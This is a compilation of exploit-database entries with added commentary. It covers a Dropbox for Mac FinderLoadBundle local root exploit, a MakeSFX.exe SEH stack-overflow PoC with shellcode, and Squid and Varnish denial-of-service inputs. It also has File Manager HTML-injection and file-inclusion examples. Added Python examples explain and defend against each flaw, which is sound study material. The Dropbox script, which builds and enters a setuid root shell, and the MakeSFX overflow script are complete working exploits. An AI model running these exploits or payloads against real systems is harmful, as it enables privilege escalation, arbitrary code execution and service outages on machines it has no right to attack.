# - vulnerable versions:        | versions not vulnerable:
# Dropbox 3.3.* for Mac         | Dropbox 3.10.* for Mac
# Dropbox 3.1.* for Mac         | Dropbox 3.9.* for Mac
# Dropbox 3.0.* for Mac         | Dropbox 3.8.* for Mac
# Dropbox 2.11.* for Mac        | Dropbox 3.7.* for Mac
# Dropbox 2.10.* for Mac        | Dropbox 3.6.* for Mac
# Dropbox 2.9.* for Mac         | Dropbox 3.5.* for Mac
# Dropbox 2.8.* for Mac         | Dropbox 3.4.* for Mac
# Dropbox 2.7.* for Mac         | Dropbox 3.2.* for Mac
# Dropbox 2.6.* for Mac         | Dropbox 1.5.1-5 for Mac
# Dropbox 2.5.* for Mac         | Dropbox 1.4.* for Mac
# Dropbox 2.4.* for Mac         | Dropbox 1.3.* for Mac
# Dropbox 2.3.* for Mac         |
# Dropbox 2.2.* for Mac         |
# Dropbox 2.1.* for Mac         |
# Dropbox 1.7.* for Mac         |
# Dropbox 1.6.* for Mac         |
# Dropbox 1.5.6 for Mac         |
#
# The vulnerability was fixed in newer DropboxHelperTools versions as of 3.4.*.
# However, there is no mention of this issue at the Dropbox release notes:
# https://www.dropbox.com/release_notes
#
# It seems that one of the fixes implemented in FinderLoadBundle is a
# check whether the path of the bundle is a root owned directory making it
# impossible to load arbitrary shared libraries as a non-privileged user.
#
# I am not sure how to find the exact version of the FinderLoadBundle executable
# but the included Info.plist contained the following key:
# <key>CFBundleShortVersionString</key>
# This key is no longer present in the plist file of the latest version. So I
# included a basic vulnerable version checker that checks for the presence of
# this key.
#
# - exploit details:
# I wrote this on OS X Yosemite (10.10.5) but there are no OS specific features
# used. This exploit relies on Xcode for the shared library + root shell to be
# compiled. After successful exploitation a root shell is left in a directory in
# /tmp so make sure you delete it on your own system when you are done testing.
#
# - example:
# $ ./dropboxfinderloadbundle.sh
# Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
#
# [-] creating temporary directory: /tmp/c7a15893fc1b28d31071c16c6663cbf3
# [-] linking /Library/DropboxHelperTools/Dropbox_u501/FinderLoadBundle
# [-] constructing bundle
# [-] creating /tmp/c7a15893fc1b28d31071c16c6663cbf3/boomsh.c
# [-] compiling root shell
# [-] executing FinderLoadBundle using root shell payload
# [-] entering root shell
# bash-3.2# id -P
# root:********:0:0::0:0:System Administrator:/var/root:/bin/sh

readonly __progname=$(basename $0)

errx() {
    echo "$__progname: $@" >&2
    exit 1
}

main() {
    local -r tmp=$(head -10 /dev/urandom | md5)
    local -r helpertools="/Library/DropboxHelperTools"
    local -r bundle="/tmp/$tmp/mach_inject_bundle_stub.bundle/Contents/MacOS"
    local -r bundletarget="$bundle/mach_inject_bundle_stub"
    local -r bundlesrc="${bundletarget}.c"
    local -r sh="/tmp/$tmp/boomsh"
    local -r shsrc="${sh}.c"
    local -r cfversion="CFBundleShortVersionString"
    local -r findbin="FinderLoadBundle"

    echo "Dropbox $findbin OS X local root exploit by cenobyte 2015"
    echo

    uname -v | grep -q ^Darwin || \
        errx "this Dropbox exploit only works on OS X"

    [ ! -d "$helpertools" ] && \
        errx "$helpertools does not exist"

    which -s gcc || \
        errx "gcc not found"

    # find a setuid root (st_mode=0104xxx) copy of FinderLoadBundle
    found=0
    for finder in $(ls $helpertools/Dropbox_u*/$findbin); do
        stat -s "$finder" | grep -q "st_mode=0104"
        if [ $? -eq 0 ]; then
            found=1
            break
        fi
    done

    [ $found -ne 1 ] && \
        errx "couldn't find a setuid root $findbin"

    local -r finderdir=$(dirname $finder)
    local -r plist="${finderdir}/DropboxBundle.bundle/Contents/Info.plist"

    [ -f "$plist" ] || \
        errx "FinderLoadBundle not vulnerable (cannot open $plist)"

    grep -q "<key>$cfversion</key>" "$plist" || \
        errx "FinderLoadBundle not vulnerable (plist missing $cfversion)"

    echo "[-] creating temporary directory: /tmp/$tmp"
    mkdir /tmp/$tmp || \
        errx "couldn't create /tmp/$tmp"

    # hard link the setuid binary into our own directory so that the bundle
    # is loaded from a location we control
    echo "[-] linking $finder"
    ln "$finder" "/tmp/$tmp/$findbin" || \
        errx "ln $finder /tmp/$tmp/$findbin failed"

    echo "[-] constructing bundle"
    mkdir -p "$bundle" || \
        errx "cannot create $bundle"

    # shared library whose constructor runs as root inside FinderLoadBundle
    echo "#include <sys/stat.h>" > "$bundlesrc"
    echo "#include <sys/types.h>" >> "$bundlesrc"
    echo "#include <stdlib.h>" >> "$bundlesrc"
    echo "#include <unistd.h>" >> "$bundlesrc"
    echo "extern void init(void) __attribute__ ((constructor));" >> "$bundlesrc"
    echo "void init(void)" >> "$bundlesrc"
    echo "{" >> "$bundlesrc"
    echo "    setuid(0);" >> "$bundlesrc"
    echo "    setgid(0);" >> "$bundlesrc"
    echo "    chown(\"$sh\", 0, 0);" >> "$bundlesrc"
    echo "    chmod(\"$sh\", S_ISUID|S_IRWXU|S_IXGRP|S_IXOTH);" >> "$bundlesrc"
    echo "}" >> "$bundlesrc"

    echo "[-] creating $shsrc"
    echo "#include <unistd.h>" > "$shsrc"
    echo "#include <stdio.h>" >> "$shsrc"
    echo "#include <stdlib.h>" >> "$shsrc"
    echo "int" >> "$shsrc"
    echo "main()" >> "$shsrc"
    echo "{" >> "$shsrc"
    echo "    setuid(0);" >> "$shsrc"
    echo "    setgid(0);" >> "$shsrc"
    echo "    system(\"/bin/bash\");" >> "$shsrc"
    echo "    return(0);" >> "$shsrc"
    echo "}" >> "$shsrc"

    echo "[-] compiling root shell"
    gcc "$shsrc" -o "$sh" || \
        errx "gcc failed for $shsrc"

    gcc -dynamiclib -o "$bundletarget" "$bundlesrc" || \
        errx "gcc failed for $bundlesrc"

    echo "[-] executing $findbin using root shell payload"
    cd "/tmp/$tmp"
    ./$findbin mach_inject_bundle_stub.bundle 2>/dev/null 1>/dev/null
    [ $? -ne 4 ] && \
        errx "exploit failed, $findbin seems not vulnerable"

    [ ! -f "$sh" ] && \
        errx "$sh was not created, exploit failed"

    stat -s "$sh" | grep -q "st_mode=0104" || \
        errx "$sh was not set to setuid root, exploit failed"

    echo "[-] entering root shell"
    "$sh"
}

main "$@"

exit 0
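The advisory's point is that FinderLoadBundle trusted the directory it was reached through, and that a hard link puts the very same file, same inode, same root owner, into a directory the attacker controls. The example below is added here and is not the exploit's or Dropbox's code: it builds a constructed tree (a stand-in for /Library/DropboxHelperTools and a world-writable stand-in for /tmp), shows the hard link keeping the inode while the path-derived search directory moves, and applies the kind of check the advisory says the fix added, inspecting the directory the bundle would be loaded from rather than the binary. The demo runs unprivileged, so `trusted_uid` is the current user rather than 0; that substitution is an assumption for the demo only.

```python
import os
import stat
import tempfile


def same_file(a, b):
    """A hard link is the same inode on the same device: owner and mode of the
    file itself never change, only the path used to reach it does."""
    sa, sb = os.stat(a), os.stat(b)
    return (sa.st_dev, sa.st_ino) == (sb.st_dev, sb.st_ino)


def bundle_dir_for(binary_path):
    """The vulnerable behaviour: derive the bundle search directory from the
    path the binary was invoked through. realpath resolves symlinks, but a hard
    link is not a symlink, so the attacker's directory comes back unchanged."""
    return os.path.dirname(os.path.realpath(binary_path))


def directory_trusted(dirpath, trusted_uid=0):
    """Refuse to load anything unless the directory is owned by the trusted uid
    (root in the real fix; parameterised so this demo can run unprivileged) and
    is not writable by group or others. Because the test is on the directory,
    hard-linking the binary elsewhere does not help the attacker."""
    st = os.stat(dirpath)
    if not stat.S_ISDIR(st.st_mode):
        return False
    if st.st_uid != trusted_uid:
        return False
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def demo():
    """Constructed tree; returns the observations and decisions taken."""
    me = os.geteuid()
    out = {}
    with tempfile.TemporaryDirectory() as root:
        system_dir = os.path.join(root, "DropboxHelperTools")
        user_dir = os.path.join(root, "tmp")
        os.mkdir(system_dir, 0o755)
        os.mkdir(user_dir)
        os.chmod(user_dir, 0o1777)              # world-writable + sticky, like /tmp

        original = os.path.join(system_dir, "FinderLoadBundle")
        with open(original, "wb") as f:
            f.write(b"#!/bin/sh\n")              # stand-in for the setuid binary

        linked = os.path.join(user_dir, "FinderLoadBundle")
        os.link(original, linked)               # what the exploit does with ln

        out["same_inode"] = same_file(original, linked)
        out["nlink"] = os.stat(original).st_nlink
        # the path-derived search directory now points into the attacker's dir
        out["search_dir_moved"] = bundle_dir_for(linked) != bundle_dir_for(original)
        # the directory check accepts the system dir and refuses the /tmp-like one
        out["system_trusted"] = directory_trusted(bundle_dir_for(original), trusted_uid=me)
        out["tmp_trusted"] = directory_trusted(bundle_dir_for(linked), trusted_uid=me)
    return out


if __name__ == "__main__":
    print(demo())
```

On Linux with `fs.protected_hardlinks=1` an unprivileged user cannot hard-link a root-owned file at all, which is why this demo links a file it owns; OS X at the time had no such restriction, which is what made the Dropbox bypass possible.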
-
MakeSFX.exe 1.44 - Local Stack Buffer Overflow
'''
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MAKESFX-BUFF-OVERFLOW-09302015.txt

Vendor:
================================
freeextractor.sourceforge.net/FreeExtractor
freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe

Vulnerable Product:
==================================================
MakeSFX.exe v1.44 Mar 19 2001 & Dec 10 2009 versions

Vulnerability Type:
============================
Stack Based Buffer Overflow

CVE Reference:
==============
N/A

Vulnerability Details:
=========================
Converts a zip file into a 32-bit GUI Windows self-extractor.

Example usage:
makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"] [/website="http://www.example.com"] [/intro="This is a test self extractor"] [/defaultpath="$desktop$\My Files"] [/autoextract] [/openexplorerwindow] [/shortcut="$desktop$\Program Shortcut.lnk|$targetdir$\Program.exe] [/delete] [/icon="MyIcon.ico"] [/overwrite] [/?] etc...

The '/title' argument when supplied an overly long payload will overwrite NSEH & SEH exception handlers causing buffer overflow, we can then execute our arbitrary shellcode.

I have seen some applications using MakeSFX.exe from .bat files for some automation purposes, if the local .bat file is replaced by malicious one attackers can cause mayhem on the system.

Both versions from 2001 & 2009 are vulnerable but exploit setup will be off by 80 bytes.

punksnotdead="/title"+"A"*1078+"BBBB"+"RRRR"   #<---- SEH Handler control MakeSFX v1.44 (Dec 10 2009)
punksnotdead="/title"+"A"*1158+"BBBB"+"RRRR"   #<---- SEH Handler control MakeSFX v1.44 (Mar 19 2001)

POC exploit code(s):
====================
We will exploit MakeSFX v1.44 (Mar 19 2001).

I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, Rebase all set to False, but it contains null 0x00.
So no suitable SEH instruction address avail, I will instead have to use mona.py to look for POP,POP,RET instruction in outside modules and we find some...

e.g. 0x77319529 : pop esi # pop edi # ret | {PAGE_READONLY}

Python script to exploitz!
==========================
'''

# Python 2: the string literals below are byte strings
import struct,os,subprocess

#MakeSFX v1.44 (Mar 19 2001)
pgm="C:\\hyp3rlinx\\MakeSFX.exe "

#shellcode to pop calc.exe
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

#punksnotdead="A"*1158+"RRRR"+"BBBB"  #<--- KABOOOOOOM!

#nSEH: short jump over the SEH record into the shellcode
nseh="\xEB\x06"+"\x90"*2
#SEH: address of a POP,POP,RET outside MakeSFX.exe
seh=struct.pack('<L', 0x76F29529)

punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10

subprocess.Popen([pgm, punksnotdead], shell=False)

'''
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 30, 2015 : Public Disclosure

Exploitation Technique:
=======================
Local

Tested successfully on Windows SP1
DisableExceptionChainValidation in registry set to '1'
value of 1 disables the registry entry that prevents SEH overwrites.

===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
'''
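The advisory quotes the two nSEH offsets (1078 and 1158 bytes) but not how they were measured. As an added example (mine, not from the advisory; it never touches MakeSFX.exe and does not need Windows), the code below implements the cyclic-pattern method that tools such as Metasploit's pattern_create/pattern_offset automate: send a non-repeating pattern as the `/title` value, read the dword that landed in the SEH handler slot from the debugger, and look it up to recover the offset. `build_seh_payload` then lays out the same nSEH/SEH/shellcode structure as the PoC and `seh_record_at` reads it back to confirm the handler sits where the measurement said. The debugger is replaced by `simulate_crash`, a constructed stand-in; the PoC's address 0x76F29529 is reused only as a sample value.

```python
import struct

UPPER = [chr(c) for c in range(ord("A"), ord("Z") + 1)]
LOWER = [chr(c) for c in range(ord("a"), ord("z") + 1)]
DIGIT = [chr(c) for c in range(ord("0"), ord("9") + 1)]
PATTERN_PERIOD = 26 * 26 * 10 * 3  # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Metasploit-style cyclic pattern 'Aa0Aa1Aa2...': no 4-byte sequence
    repeats within one period, so a dword read from a register or from the
    overwritten SEH record identifies exactly one offset."""
    if length > PATTERN_PERIOD:
        raise ValueError("pattern longer than %d bytes would repeat" % PATTERN_PERIOD)
    full = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGIT)
    return full[:length]


def pattern_offset(value):
    """`value` is what the debugger shows in the handler slot: a 4-char
    string, 4 bytes, or the little-endian dword as an int. Returns the byte
    offset into the pattern, or -1 if it is not from the pattern."""
    if isinstance(value, int):
        value = struct.pack("<L", value)
    if isinstance(value, bytes):
        value = value.decode("latin-1")
    return pattern_create(PATTERN_PERIOD).find(value)


def build_seh_payload(nseh_offset, ppr_addr, shellcode, prefix=b"/title"):
    """Same layout as the PoC:
    [prefix][filler][nSEH: jmp +6][SEH: pop/pop/ret address][shellcode].
    nseh_offset is the distance from the end of the prefix to nSEH."""
    nseh = b"\xEB\x06" + b"\x90" * 2          # short jump over the 8-byte SEH record
    seh = struct.pack("<L", ppr_addr)         # little-endian handler address
    return prefix + b"A" * nseh_offset + nseh + seh + shellcode


def seh_record_at(payload, nseh_offset, prefix=b"/title"):
    """Read nSEH (raw bytes) and SEH (as an int) back out of a payload."""
    start = len(prefix) + nseh_offset
    nseh = payload[start:start + 4]
    seh = struct.unpack("<L", payload[start + 4:start + 8])[0]
    return nseh, seh


def simulate_crash(argument, true_nseh_offset, prefix=b"/title"):
    """Constructed stand-in for the debugger: the program copies `argument`
    into a fixed stack buffer, so the bytes at prefix+offset overwrite nSEH
    and the next four overwrite the handler. Returns the handler dword.
    Real measurement reads this value from a debugger attached to the target."""
    record = len(prefix) + true_nseh_offset
    return struct.unpack("<L", argument[record + 4:record + 8])[0]


def find_nseh_offset(true_nseh_offset, pattern_len=1300):
    """The measurement procedure end to end: send a pattern as the /title
    value, read the handler dword from the crash, look it up, subtract the
    4 bytes of nSEH that sit in front of the handler."""
    pattern = pattern_create(pattern_len).encode("latin-1")
    handler = simulate_crash(b"/title" + pattern, true_nseh_offset)
    return pattern_offset(handler) - 4


if __name__ == "__main__":
    for real in (1078, 1158):
        print("measured nSEH offset:", find_nseh_offset(real))
    p = build_seh_payload(1158, 0x76F29529, b"\xCC" * 8)
    print("record at 1158:", seh_record_at(p, 1158))
```

The 80-byte difference between the two builds shows up as two different lookups, not two different payload layouts, which is why the PoC only needs the filler length changed to move between the 2001 and 2009 binaries.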
-
Squid - 'httpMakeVaryMark()' Remote Denial of Service
source: https://www.securityfocus.com/bid/58319/info

Squid is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.

Squid 3.2.5 is vulnerable; other versions may also be affected.

Request
-- cut --
#!/usr/bin/env python
# writes the request to stdout; pipe it to the proxy, e.g. ./poc.py | nc localhost 3128
print('GET /index.html HTTP/1.1')
print('Host: localhost')
print('X-HEADSHOT: ' + '%XX' * 19000)
print('\r\n\r\n')
-- cut --

Response
-- cut --
HTTP/1.1 200 OK
Vary: X-HEADSHOT
-- cut --
-
File Manager - HTML Injection / Local File Inclusion
source: https://www.securityfocus.com/bid/58313/info

File Manager is prone to an HTML-injection vulnerability and a local file-include vulnerability.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, steal cookie-based authentication credentials and open or run arbitrary files in the context of the web server process. Other attacks are also possible.

File Manager 1.2 is vulnerable; other versions may also be affected.

Local file-include:

<div id="bodyspace"><div id="main_menu"><h1>File Manager</h1></div><div id="main_left">
<img src="http://www.example.com/images/wifilogo2.png" alt="" title="" border="0"><ul class="menu"><li class="item-101 current active">
<a href="http://www.example.com/" target="_blank">Hilfe</a></li><li class="item-110">
<a href="http://www.example.com/index.php/feedback-support" target="_blank">Kontakt / Feedback</a></li></ul></div>
<div id="module_main"><bq>Files</bq><p><a href="..">..</a><br>
<a href="1234.png.txt.iso.php.asp">1234.png.txt.iso.php.asp</a> ( 95.8 Kb, 2013-02-11 07:41:12 +0000)<br>
<a href="[../../>[UNAUTHORIZED LOCAL FILE/PATH INCLUDE VULNERABILITY]]">[../../>[UNAUTHORIZED LOCAL FILE/PATH INCLUDE VULNERABILITY]]</a> ( 27.3 Kb, 2013-02-11 07:45:01 +0000)<br />
<a href="About/">About/</a> ( 0.1 Kb, 2012-10-10 18:20:14 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file <input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" />
</label></form></div></center></body></html></iframe></a></p></div></div>

HTML-injection:

<div id="bodyspace"><div id="main_menu"><h1>File Manager</h1></div><div id="main_left">
<img src="http://www.example.com/images/wifilogo2.png" alt="" title="" border="0"><ul class="menu"><li class="item-101 current active">
<a href="http://www.example.com/" target="_blank">Hilfe</a></li><li class="item-110">
<a href="http://www.example.com/index.php/feedback-support" target="_blank">Kontakt / Feedback</a></li></ul></div>
<div id="module_main"><bq>Files</bq><p><a href="..">..</a><br>
<a href="[PERSISTENT INJECTED SCRIPT CODE!].png.txt.iso.php.asp">[PERSISTENT INJECTED SCRIPT CODE!].png.txt.iso.php.asp</a> ( 95.8 Kb, 2013-02-11 07:41:12 +0000)<br>
<a href="[PERSISTENT INJECTED SCRIPT CODE!]">[PERSISTENT INJECTED SCRIPT CODE!]</a> ( 27.3 Kb, 2013-02-11 07:45:01 +0000)<br />
<a href="About/">About/</a> ( 0.1 Kb, 2012-10-10 18:20:14 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file <input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" />
</label></form></div></center></body></html></iframe></a></p></div></div>
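The Count Per Day report earlier on this page and this File Manager report share a root cause: a request parameter, or an uploaded filename, is written straight into HTML, and in File Manager the filename is also used as a path under the web root. The example below is added here and is not code from either plugin (both are PHP; this is a Python model of the same rendering and path handling). It reflects `daytoshow` only after validating it as a date and escaping it for an attribute, renders the listing markup with attribute and text escaping, and resolves every listed name against the document root, dropping any that escape it. The sample entries are constructed from the payloads quoted in the two reports; `/var/www/files` is an assumed document root and need not exist.

```python
import html
import os
import re

DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def attr(value):
    """Escape for a double-quoted HTML attribute (quote=True also escapes " and ')."""
    return html.escape(str(value), quote=True)


def text(value):
    """Escape for HTML text content."""
    return html.escape(str(value), quote=False)


def vulnerable_day_form(daytoshow):
    """The pattern the Count Per Day report describes: raw reflection into value=""."""
    return '<input type="text" name="daytoshow" value="%s">' % daytoshow


def render_day_form(daytoshow, validate=True):
    """Hardened form: an input that is not YYYY-MM-DD is dropped rather than
    reflected, and whatever survives is attribute-escaped. validate=False shows
    that escaping alone already neutralises the payload."""
    if validate and not DATE_RE.match(daytoshow):
        daytoshow = ""
    return '<input type="text" name="daytoshow" value="%s">' % attr(daytoshow)


def safe_join(base_dir, name):
    """Resolve `name` under base_dir. Rejects empty, '.', '..' and absolute
    names, and anything that resolves (via '..' or a symlink) outside base_dir.
    realpath normalises lexically even when the path does not exist."""
    base = os.path.realpath(base_dir)
    if not name or name in (".", "..") or os.path.isabs(name):
        raise ValueError("rejected name: %r" % name)
    candidate = os.path.realpath(os.path.join(base, name))
    if candidate != base and not candidate.startswith(base + os.sep):
        raise ValueError("path escapes document root: %r" % name)
    return candidate


def render_listing(base_dir, entries):
    """File Manager style listing. `entries` is a list of (name, size_kb, mtime)
    as the plugin prints them. Names that fail safe_join are skipped; the rest
    are escaped separately for the href attribute and the link text."""
    rows = []
    for name, size_kb, mtime in entries:
        try:
            safe_join(base_dir, name)
        except ValueError:
            continue
        rows.append('<a href="%s">%s</a> ( %s Kb, %s)<br />'
                    % (attr(name), text(name), size_kb, mtime))
    return "\n".join(rows)


# constructed inputs built from the payloads quoted in the two reports
XSS_DAY = '2013-03-04"><img src=x onerror=alert(1)>'
ENTRIES = [
    ("1234.png.txt.iso.php.asp", "95.8", "2013-02-11 07:41:12 +0000"),
    ("../../etc/passwd", "27.3", "2013-02-11 07:45:01 +0000"),
    ('"><script>alert(1)</script>.png', "1.0", "2013-02-11 07:45:01 +0000"),
    ("About/", "0.1", "2012-10-10 18:20:14 +0000"),
]

if __name__ == "__main__":
    print(vulnerable_day_form(XSS_DAY))
    print(render_day_form(XSS_DAY, validate=False))
    print(render_day_form(XSS_DAY))
    print(render_listing("/var/www/files", ENTRIES))
```

Escaping is chosen per context (attribute versus text) because the same filename lands in both `href="..."` and the link body; the path check is done on the resolved path rather than by stripping `../`, since stripping leaves encoded or doubled variants through.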
-
Varnish Cache - Multiple Denial of Service Vulnerabilities
source: https://www.securityfocus.com/bid/58314/info

Varnish Cache is prone to multiple denial-of-service vulnerabilities.

An attacker can exploit these issues to crash the application, effectively denying service to legitimate users.

Varnish Cache 2.1.5 is vulnerable; other versions may also be affected.

The following example data is available:

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 99999999999999999

HTTP/1.1 200 OK
Content-Length: 2147483647
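The Squid request earlier on this page (a 57,000-byte header value that ends up in a Vary mark) and these two Varnish responses (a Content-Length far larger than any body, and one at exactly 2^31-1) are inputs a proxy accepts syntactically but cannot handle. The example below is added here and is not Squid or Varnish code: a small parser for a HTTP/1.x message head that enforces, before any header value is used, a cap on the whole head, a cap on each header line, and a Content-Length that is strictly decimal, not duplicated with conflicting values, short enough to be a 64-bit size and within a configured body cap. The three messages from the two reports are rebuilt inline (the Squid probe with the CRLF framing the PoC's print statements only approximate); the numeric caps are assumptions for the demo, not either product's defaults.

```python
import re

MAX_HEAD = 64 * 1024   # whole request/response head (demo value)
MAX_LINE = 8 * 1024    # any single header line (demo value)
MAX_BODY = 1 << 30     # 1 GiB body cap (demo value; deployment-specific)
CL_RE = re.compile(rb"^[0-9]+$")


class HeaderError(Exception):
    pass


def parse_head(raw, max_head=MAX_HEAD, max_line=MAX_LINE, max_body=MAX_BODY):
    """Parse a HTTP/1.x head (start line plus headers up to the blank line).
    Returns (start_line, [(name, value), ...], content_length_or_None).
    Raises HeaderError instead of passing an oversized or malformed value on
    to code that would build a Vary mark or size a body buffer from it."""
    end = raw.find(b"\r\n\r\n")
    if end < 0:
        raise HeaderError("no end of head within input")
    if end + 4 > max_head:
        raise HeaderError("head exceeds %d bytes" % max_head)
    lines = raw[:end].split(b"\r\n")
    start_line, header_lines = lines[0], lines[1:]
    headers = []
    for line in header_lines:
        if len(line) > max_line:
            raise HeaderError("header line exceeds %d bytes" % max_line)
        if line[:1] in (b" ", b"\t"):
            raise HeaderError("obsolete line folding rejected")
        name, sep, value = line.partition(b":")
        if not sep or not name.strip() or b" " in name.strip():
            raise HeaderError("malformed header line: %r" % line[:40])
        headers.append((name.strip().lower(), value.strip()))

    values = [v for n, v in headers if n == b"content-length"]
    content_length = None
    if values:
        if len(set(values)) != 1:
            raise HeaderError("conflicting Content-Length values")
        v = values[0]
        if not CL_RE.match(v):
            raise HeaderError("Content-Length is not a decimal integer")
        if len(v) > 19:   # more digits than a signed 64-bit size can hold
            raise HeaderError("Content-Length too long to be a size")
        content_length = int(v)
        if content_length > max_body:
            raise HeaderError("Content-Length %d exceeds cap %d" % (content_length, max_body))
    return start_line, headers, content_length


def verdict(raw, **limits):
    """'ok' or the rejection reason, for table-style checks."""
    try:
        parse_head(raw, **limits)
        return "ok"
    except HeaderError as e:
        return str(e)


def squid_probe(n=19000):
    """The Squid PoC request rebuilt with proper CRLF line endings."""
    return (b"GET /index.html HTTP/1.1\r\nHost: localhost\r\n"
            b"X-HEADSHOT: " + b"%XX" * n + b"\r\n\r\n")


# constructed from the two Varnish responses quoted in the report
VARNISH_HUGE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/xml; charset=utf-8\r\n"
                b"Content-Length: 99999999999999999\r\n\r\n")
VARNISH_INT_MAX = b"HTTP/1.1 200 OK\r\nContent-Length: 2147483647\r\n\r\n"

if __name__ == "__main__":
    print("squid probe:   ", verdict(squid_probe()))
    print("varnish huge:  ", verdict(VARNISH_HUGE))
    print("varnish 2^31-1:", verdict(VARNISH_INT_MAX))
    print("2^31-1 with 4 GiB cap:", verdict(VARNISH_INT_MAX, max_body=1 << 32))
```

The 2147483647 case is rejected here only because it exceeds the demo's body cap; a proxy that is allowed to serve bodies that large must also carry the value in a 64-bit type, since 2^31-1 is the last value that fits a signed 32-bit int and anything derived from it by addition overflows.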